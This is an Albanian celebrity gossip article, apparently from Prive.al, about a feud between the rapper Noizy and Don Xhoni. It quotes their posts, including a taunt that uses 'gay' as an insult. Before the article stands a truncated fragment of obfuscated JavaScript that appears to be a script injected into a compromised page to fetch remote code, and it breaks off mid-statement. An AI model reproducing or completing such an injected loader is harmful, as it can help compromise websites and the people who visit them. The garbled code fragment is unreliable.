;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kjo s’pritej! Plas mes Noizyt dhe Don Xhonit

By

Noizy siç ndodh shpesh ka qenë edhe këto ditë kryetemë.

Përplasja e tij në distancë me Meriton Mjekiqin dhe anëtërët e tjerë të rrethit të moderatorit, duket të mos ketë qenë e vetmja.

Në shënjestrën e radhës është Don Xhoni.

Gjithçka ka nisur pasi Don Xhoni ka thumbuar Dullën, një prej anëtarëve të OTR duke i kujtuar përmes story-ve që i ka pëlqyer një nga postimet e tij, duke deklaruar se e ka “fans”.

Kaq ka mjaftuar që Noizy të kundërpërgjigjet.

Ai ka nxjerrë “arsenalin” që e priste prej kohësh, postimet e Don Xhonit të vogël që dëgjonte Noizyn para 8-9 vitesh si fëmijë.

“Kalo nga grupi jonë se ki me u bo gay. Hajde te idhulli jot, nuk të nguci të premtoj” – shprehet Rigelsi teksa e përmbyllë me mesazhin “Boll jena përça” të këngës që postonte dikur Don Xhoni në profilin e tij.

Ndërkaq nuk ka munguar as përgjigja e Don Xhonit. Ai ka shprehur respekt e “dashuri” për të gjithë reperët e vjetër duke thënë që i ka dëgjuar të gjithë sepse i ka vetëm 20 vjet. Por nuk ka ngelur pa ia përmendur faktin që anëtari i OTR i ka pëlqyer postimin. /Prive.al

Artikuj të ngjashëm